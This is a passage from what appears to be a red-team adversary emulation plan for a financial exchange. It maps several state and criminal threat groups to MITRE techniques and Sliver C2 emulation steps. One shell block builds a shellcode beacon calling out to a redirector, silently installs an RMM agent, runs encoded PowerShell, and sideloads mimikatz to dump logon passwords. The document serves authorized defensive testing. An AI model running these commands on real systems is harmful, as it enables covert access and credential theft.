&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;Spear-phishing from compromised organizational email accounts; lures themed as regulatory compliance docs, webinar invites, or financial recruiter outreach&lt;&#x2F;td&gt;&lt;td&gt;T1566.001, T1566.002&lt;&#x2F;td&gt;&lt;td&gt;Gophish with Rothschild&#x2F;regulatory lure templates; Sliver beacon in payload&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Execution&lt;&#x2F;td&gt;&lt;td&gt;BugSleep backdoor injected into target process via WriteProcessMemory&#x2F;CreateRemoteThread; macro-enabled Office documents; VBS scripts dropping RMM installers&lt;&#x2F;td&gt;&lt;td&gt;T1059.001, T1059.005, T1204.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver shellcode wrapped in custom injector; &lt;code&gt;execute-assembly&lt;&#x2F;code&gt; for .NET payloads&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Persistence&lt;&#x2F;td&gt;&lt;td&gt;Scheduled tasks (BugSleep persistence method); Registry run keys; Winlogon hijack via AutodialDLL&lt;&#x2F;td&gt;&lt;td&gt;T1053.005, T1547.001, T1574.012&lt;&#x2F;td&gt;&lt;td&gt;&lt;code&gt;task-scheduler&lt;&#x2F;code&gt; via Sliver; &lt;code&gt;registry write&lt;&#x2F;code&gt;&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Defense Evasion&lt;&#x2F;td&gt;&lt;td&gt;Sleep API sandbox evasion; DLL sideloading (PowGoop masquerading as GoogleUpdate.exe); C2 infrastructure limited to a few days uptime to hinder attribution; obfuscated PowerShell&lt;&#x2F;td&gt;&lt;td&gt;T1497.003, T1574.002, T1027&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;--evasion&lt;&#x2F;code&gt; flag; beacon jitter &lt;code&gt;--seconds 3600 --jitter 30&lt;&#x2F;code&gt; mimicking infrastructure rotation&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Credential Access&lt;&#x2F;td&gt;&lt;td&gt;Mimikatz via custom loader&#x2F;injector; LaZagne; browser credential theft&lt;&#x2F;td&gt;&lt;td&gt;T1003.001, T1555.003&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;sideload mimikatz.dll&lt;&#x2F;code&gt;; BOF credential harvester&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;Legitimate RMM tool abuse (Atera, AnyDesk, SimpleHelp, NetBird, ConnectWise ScreenConnect, PDQ) for hands-on keyboard sessions; WMI; pass-the-hash&lt;&#x2F;td&gt;&lt;td&gt;T1219, T1047, T1550.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;wmiexec&lt;&#x2F;code&gt;; &lt;code&gt;portfwd&lt;&#x2F;code&gt; for RDP via WireGuard; NetExec&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Collection&lt;&#x2F;td&gt;&lt;td&gt;File staging via BugSleep file transfer; cloud service abuse (Egnyte subdomains mimicking target company names); Telegram Bot API C2 (Small Sieve)&lt;&#x2F;td&gt;&lt;td&gt;T1074.001, T1567.002, T1102&lt;&#x2F;td&gt;&lt;td&gt;Sliver DNS tunnel for low-noise exfil staging&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Exfiltration&lt;&#x2F;td&gt;&lt;td&gt;HTTPS upload via DarkBeatC2 or RMM file transfer; Egnyte&#x2F;OneDrive abuse&lt;&#x2F;td&gt;&lt;td&gt;T1567.002, T1041&lt;&#x2F;td&gt;&lt;td&gt;Sliver WireGuard tunnel or DNS beacon&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Access Brokering&lt;&#x2F;td&gt;&lt;td&gt;Credential hand-off to other IRGC&#x2F;MOIS-aligned groups (observed Lyceum&#x2F;Storm-1084 hand-offs)&lt;&#x2F;td&gt;&lt;td&gt;T1078&lt;&#x2F;td&gt;&lt;td&gt;Not directly emulated; document as finding if credentials reach crown jewel level&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;&lt;strong&gt;Notable CVEs for Scenario Use:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;CVE-2024-1709 — ConnectWise ScreenConnect auth bypass (documented in Charming Kitten leaked materials and MuddyWater infrastructure overlap)&lt;&#x2F;li&gt;
&lt;li&gt;CVE-2023-27350 — PaperCut RCE (exploited by MuddyWater for server-side initial access)&lt;&#x2F;li&gt;
&lt;li&gt;CVE-2020-1472 — Zerologon (used in post-exploitation privilege escalation)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;Financial Sector Specific Concern — CFO &#x2F; Finance Executive Targeting:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Infrastructure analysis reveals consistent use of Firebase-hosted phishing pages, evolving C2 IP addresses, and identical NetBird setup keys across campaigns — indicating a persistent, operationally disciplined adversary adapting to detection while retaining core targeting of financial decision-makers. For a financial exchange, this translates to a direct threat to individuals with trade authorization, settlement approval authority, and access to SWIFT messaging credentials.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Sliver-Specific Emulation Notes:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;MuddyWater&#x27;s hallmark RMM-abuse pattern is best emulated using Sliver&#x27;s built-in persistence combined with a simulated RMM agent installation:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #FFFFFF; background-color: #262335;&quot;&gt;&lt;code data-lang=&quot;shellscript&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# Simulate RMM-based persistence (Atera&#x2F;SimpleHelp pattern)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# Stage 1: Deliver Sliver HTTPS beacon via phishing lure&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt; profiles new beacon&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --http&lt;&#x2F;span&gt;&lt;span&gt; https:&#x2F;&#x2F;sliver-redirector.com&lt;&#x2F;span&gt;&lt;span style=&quot;color: #36F9F6;&quot;&gt; \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt;  --os&lt;&#x2F;span&gt;&lt;span&gt; windows&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --format&lt;&#x2F;span&gt;&lt;span&gt; shellcode&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --evasion&lt;&#x2F;span&gt;&lt;span&gt; mw-rmm-profile&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# Stage 2: Post-access — simulate RMM agent registration for persistence&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt; (SESSION)&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;span&gt; execute -o cmd.exe &#x2F;c &lt;&#x2F;span&gt;&lt;span style=&quot;color: #FF8B39;&quot;&gt;&amp;quot;msiexec &#x2F;i AteraAgent.msi &#x2F;quiet&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# Simulate BugSleep sleep-evasion behavior via beacon jitter&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt;&amp;gt; profiles beacon-interval&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt; --profile&lt;&#x2F;span&gt;&lt;span&gt; mw-rmm-profile&lt;&#x2F;span&gt;&lt;span style=&quot;color: #36F9F6;&quot;&gt; \&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F97E72;&quot;&gt;  --seconds 7200 --jitter 600&lt;&#x2F;span&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;   # Long beacon interval, high jitter&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# Simulate DarkBeatC2 PowerShell C2 pattern&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt; (SESSION)&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;span&gt; execute-assembly &#x2F;tmp&#x2F;PowerShellRunner.exe &lt;&#x2F;span&gt;&lt;span style=&quot;color: #36F9F6;&quot;&gt;\&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;  -EncodedCommand&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt; &amp;lt;&lt;&#x2F;span&gt;&lt;span&gt;base64-obfuscated-PS&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #848BBD;font-style: italic;&quot;&gt;# Simulate Mimikatz via custom loader (no disk drop)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #FE4450;&quot;&gt;sliver&lt;&#x2F;span&gt;&lt;span&gt; (SESSION)&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FEDE5D;&quot;&gt;&amp;gt;&lt;&#x2F;span&gt;&lt;span&gt; sideload &#x2F;tmp&#x2F;mimikatz.dll sekurlsa::logonpasswords&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;NIST 800-53 Controls Tested:&lt;&#x2F;strong&gt; AC-2, AC-17, IA-5, SI-3, SI-4, SC-7, AU-12, IR-4, SA-9 (third-party risk — RMM abuse), CA-8&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Key Detection Gaps to Validate:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Detection of unauthorized RMM tool installations (Atera, SimpleHelp, NetBird, PDQ) — NYDFS §500.14(b) EDR requirement&lt;&#x2F;li&gt;
&lt;li&gt;Alerting on PowerShell download cradles executed from unusual parent processes&lt;&#x2F;li&gt;
&lt;li&gt;Network baseline for legitimate vs. unauthorized use of WireGuard UDP&#x2F;51820 and RMM agent beacon traffic&lt;&#x2F;li&gt;
&lt;li&gt;Email security controls against phishing from &lt;strong&gt;compromised legitimate organizational email accounts&lt;&#x2F;strong&gt; (SPF&#x2F;DKIM pass → MuddyWater&#x27;s primary delivery method bypasses standard email filtering)&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-6-predatory-sparrow-gonjeshke-darande-israel-likely-unit-8200-affiliated&quot;&gt;APT 6 — Predatory Sparrow &#x2F; Gonjeshke Darande (Israel — Likely Unit 8200 affiliated)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: High | Focus: Financial infrastructure destruction and disruption&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;On June 17, 2025, shortly after Israeli airstrikes against Iran, Predatory Sparrow claimed a cyberattack on Iran&#x27;s state-owned Bank Sepah, causing widespread service outages and claiming to have destroyed the bank&#x27;s data. The group also claimed responsibility for an attack on the Iranian cryptocurrency exchange Nobitex the following day, stealing $90 million in crypto assets and then destroying the funds by sending them to inaccessible addresses.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Relevance to U.S. Exchange Red Team:&lt;&#x2F;strong&gt; Predatory Sparrow&#x27;s TTPs — infrastructure-layer destruction combined with financial data exfiltration and transaction system disruption — are the highest-fidelity public template for what a destructive state-level attack on a financial exchange looks like. Any U.S. exchange with Israeli vendor relationships, Israeli-licensed technology, or geopolitically exposed market participants should model against this profile.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Reconnaissance&lt;&#x2F;td&gt;&lt;td&gt;Deep intelligence gathering on target financial infrastructure topology&lt;&#x2F;td&gt;&lt;td&gt;T1590, T1591&lt;&#x2F;td&gt;&lt;td&gt;OSINT + Shodan&#x2F;Censys mapping&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;Likely supply chain &#x2F; insider access to core banking&#x2F;exchange systems&lt;&#x2F;td&gt;&lt;td&gt;T1195.002, T1078&lt;&#x2F;td&gt;&lt;td&gt;Sliver beacon via compromised vendor credential&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Execution&lt;&#x2F;td&gt;&lt;td&gt;Destructive wiper payload deployment to banking transaction systems&lt;&#x2F;td&gt;&lt;td&gt;T1485, T1561.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;execute-assembly&lt;&#x2F;code&gt; wiper simulation (non-destructive flag)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Impact&lt;&#x2F;td&gt;&lt;td&gt;Data destruction + transaction system disruption + crypto asset drain&lt;&#x2F;td&gt;&lt;td&gt;T1657, T1490&lt;&#x2F;td&gt;&lt;td&gt;Crown jewel access demonstration; SWIFT staging&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;&lt;strong&gt;NIST 800-53 Controls Tested:&lt;&#x2F;strong&gt; CP-9, CP-10, SI-12, IR-4, IR-6, SC-28&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-7-apt29-midnight-blizzard-cozy-bear-russia-svr&quot;&gt;APT 7 — APT29 &#x2F; Midnight Blizzard &#x2F; Cozy Bear (Russia — SVR)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: Critical | MITRE: G0016 | Sponsor: Foreign Intelligence Service (SVR)&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;APT29 has shifted from traditional malware-heavy operations toward cloud-native tradecraft, heavily targeting identity systems, OAuth applications, and federated trust configurations to move laterally without deploying detectable payloads. High-profile intrusions include the SolarWinds supply chain compromise (2020) and the Microsoft corporate breach (January 2024).&lt;&#x2F;p&gt;
&lt;p&gt;APT29 has used Sliver in their intrusion campaigns to build out robust C2 infrastructures — making Sliver the precisely correct tool for emulating this actor&#x27;s tradecraft.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;2024–2025 Activity:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;WINELOADER was attributed with high confidence to APT29 in November 2024. The backdoor employs re-encryption and zeroing of memory buffers to guard sensitive data in memory and evade forensics; C2 servers only respond to specific request types at certain times to prevent automated analysis from retrieving C2 responses.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;Spear-phishing with ROOTSAW dropper → WINELOADER second-stage&lt;&#x2F;td&gt;&lt;td&gt;T1566.001&lt;&#x2F;td&gt;&lt;td&gt;Sliver HTTPS beacon deployed via ROOTSAW-style dropper&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Execution&lt;&#x2F;td&gt;&lt;td&gt;WINELOADER via DLL sideloading from legitimate binary&lt;&#x2F;td&gt;&lt;td&gt;T1574.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;sideload&lt;&#x2F;code&gt; module&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Persistence&lt;&#x2F;td&gt;&lt;td&gt;Multiple redundant implants; cloud service C2 (OneDrive, Graph API)&lt;&#x2F;td&gt;&lt;td&gt;T1078.004, T1567.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver beacon + Graph API exfil tunnel&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Defense Evasion&lt;&#x2F;td&gt;&lt;td&gt;Time-gated C2 (server only responds at specific hours); memory zeroing; residential proxy rotation&lt;&#x2F;td&gt;&lt;td&gt;T1027, T1090.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;beacon-interval&lt;&#x2F;code&gt; + jitter config; redirector with time-based allow rules&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;OAuth token abuse; federated identity exploitation; service account Kerberoasting&lt;&#x2F;td&gt;&lt;td&gt;T1528, T1558.003&lt;&#x2F;td&gt;&lt;td&gt;Sliver + AADInternals OAuth token extraction; Rubeus Kerberoast&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Collection&lt;&#x2F;td&gt;&lt;td&gt;Cloud resource enumeration; M365 mail access&lt;&#x2F;td&gt;&lt;td&gt;T1114.002, T1530&lt;&#x2F;td&gt;&lt;td&gt;ROADtools + Sliver execute-assembly&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Exfiltration&lt;&#x2F;td&gt;&lt;td&gt;Low-and-slow exfil via legitimate cloud services&lt;&#x2F;td&gt;&lt;td&gt;T1567.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver DNS&#x2F;WireGuard tunnel&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;&lt;strong&gt;NIST 800-53 Controls Tested:&lt;&#x2F;strong&gt; IA-8, AC-3, SC-7, AU-2, SI-4, IR-4&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-8-apt28-fancy-bear-forest-blizzard-russia-gru-unit-26165&quot;&gt;APT 8 — APT28 &#x2F; Fancy Bear &#x2F; Forest Blizzard (Russia — GRU Unit 26165)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: High | MITRE: G0007 | Sponsor: GRU Military Intelligence&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The FBI warned that Russia&#x27;s GRU via APT28 has been exploiting TP-Link routers via CVE-2023-50224 since at least 2024, changing device settings to introduce attacker-controlled DNS resolvers and set up adversary-in-the-middle attacks against encrypted traffic. The GRU also engaged in credential-targeting phishing campaigns against European government entities, leveraging VPNs, Tor, data center IPs, and compromised EdgeOS routers to anonymize operations.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;Spear-phishing for credential harvest; compromised SOHO router DNS hijacking&lt;&#x2F;td&gt;&lt;td&gt;T1566, T1557.001&lt;&#x2F;td&gt;&lt;td&gt;Evilginx2 AiTM + Sliver beacon on credential capture&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Persistence&lt;&#x2F;td&gt;&lt;td&gt;Implants on edge routers; legitimate credentials from credential spray&lt;&#x2F;td&gt;&lt;td&gt;T1078, T1505&lt;&#x2F;td&gt;&lt;td&gt;Sliver implant on compromised network device&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;Credential reuse; LOLBins&lt;&#x2F;td&gt;&lt;td&gt;T1550.002, T1218&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;psexec&lt;&#x2F;code&gt;; NetExec pass-the-hash&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Collection&lt;&#x2F;td&gt;&lt;td&gt;Credential harvesting from M365; email exfiltration&lt;&#x2F;td&gt;&lt;td&gt;T1114.002&lt;&#x2F;td&gt;&lt;td&gt;Sliver + AADInternals&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Defense Evasion&lt;&#x2F;td&gt;&lt;td&gt;Tor&#x2F;VPN&#x2F;data center IP anonymization; living-off-the-land&lt;&#x2F;td&gt;&lt;td&gt;T1090, T1036&lt;&#x2F;td&gt;&lt;td&gt;Sliver with redirectors behind Cloudflare&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;&lt;strong&gt;NIST 800-53 Controls Tested:&lt;&#x2F;strong&gt; IA-5, SC-7, AU-12, SI-4, AC-17&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-9-scattered-spider-unc3944-cybercriminal-english-speaking&quot;&gt;APT 9 — Scattered Spider &#x2F; UNC3944 (Cybercriminal, English-speaking)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: High | Focus: Cloud financial infrastructure&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;A notable long-term Scattered Spider campaign targeted cloud infrastructures within insurance and financial sectors through mid-2024, leveraging ransomware strains including RansomHub, BlackCat, and Qilin alongside custom phishing pages impersonating internal portals and Okta&#x2F;MFA prompts.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;SMS vishing &#x2F; help desk social engineering; SIM-swap&lt;&#x2F;td&gt;&lt;td&gt;T1598.004, T1566.004&lt;&#x2F;td&gt;&lt;td&gt;Voice phishing scripts; Sliver beacon after MFA reset&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Persistence&lt;&#x2F;td&gt;&lt;td&gt;Attacker MFA device enrollment via help desk reset&lt;&#x2F;td&gt;&lt;td&gt;T1098.005&lt;&#x2F;td&gt;&lt;td&gt;Sliver implant + AADInternals device enrollment&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Privilege Escalation&lt;&#x2F;td&gt;&lt;td&gt;MFA push fatigue; Azure AD conditional access bypass&lt;&#x2F;td&gt;&lt;td&gt;T1621&lt;&#x2F;td&gt;&lt;td&gt;Evilginx2 MFA bypass + Sliver HTTPS&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;Azure AD → M365 → SharePoint → OneDrive&lt;&#x2F;td&gt;&lt;td&gt;T1538, T1530&lt;&#x2F;td&gt;&lt;td&gt;Sliver + ROADtools&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Impact&lt;&#x2F;td&gt;&lt;td&gt;RansomHub&#x2F;BlackCat deployment; double extortion&lt;&#x2F;td&gt;&lt;td&gt;T1486, T1657&lt;&#x2F;td&gt;&lt;td&gt;Simulated ransomware staging (no encryption executed)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;hr &#x2F;&gt;
&lt;h3 id=&quot;apt-10-ransomhub-raas-affiliate&quot;&gt;APT 10 — RansomHub (RaaS Affiliate)&lt;&#x2F;h3&gt;
&lt;p&gt;&lt;strong&gt;Risk Rating: High | Focus: Financial sector volume targeting&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Emerging in February 2024, RansomHub became the second-most active ransomware group that year, claiming 38 victims in the financial sector between April 2024 and April 2025, with known TTPs including phishing and exploiting public-facing vulnerabilities.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Kill Chain:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;Phase&lt;&#x2F;th&gt;&lt;th&gt;TTP&lt;&#x2F;th&gt;&lt;th&gt;MITRE ID&lt;&#x2F;th&gt;&lt;th&gt;Sliver Emulation&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;Initial Access&lt;&#x2F;td&gt;&lt;td&gt;Fortinet, Citrix, VPN CVE exploitation&lt;&#x2F;td&gt;&lt;td&gt;T1190&lt;&#x2F;td&gt;&lt;td&gt;Metasploit + Sliver beacon on shell&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Defense Evasion&lt;&#x2F;td&gt;&lt;td&gt;EDRKillShifter — BYOVD to disable EDR&lt;&#x2F;td&gt;&lt;td&gt;T1562.001&lt;&#x2F;td&gt;&lt;td&gt;BYOVD simulation + Sliver evasion flags&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Lateral Movement&lt;&#x2F;td&gt;&lt;td&gt;RDP pivoting; credential reuse&lt;&#x2F;td&gt;&lt;td&gt;T1021.001&lt;&#x2F;td&gt;&lt;td&gt;Sliver &lt;code&gt;portfwd&lt;&#x2F;code&gt;; NetExec&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;Impact&lt;&#x2F;td&gt;&lt;td&gt;Double extortion: exfil + encryption&lt;&#x2F;td&gt;&lt;td&gt;T1486, T1657&lt;&#x2F;td&gt;&lt;td&gt;Crown jewel access + staged exfil demo&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;hr &#x2F;&gt;
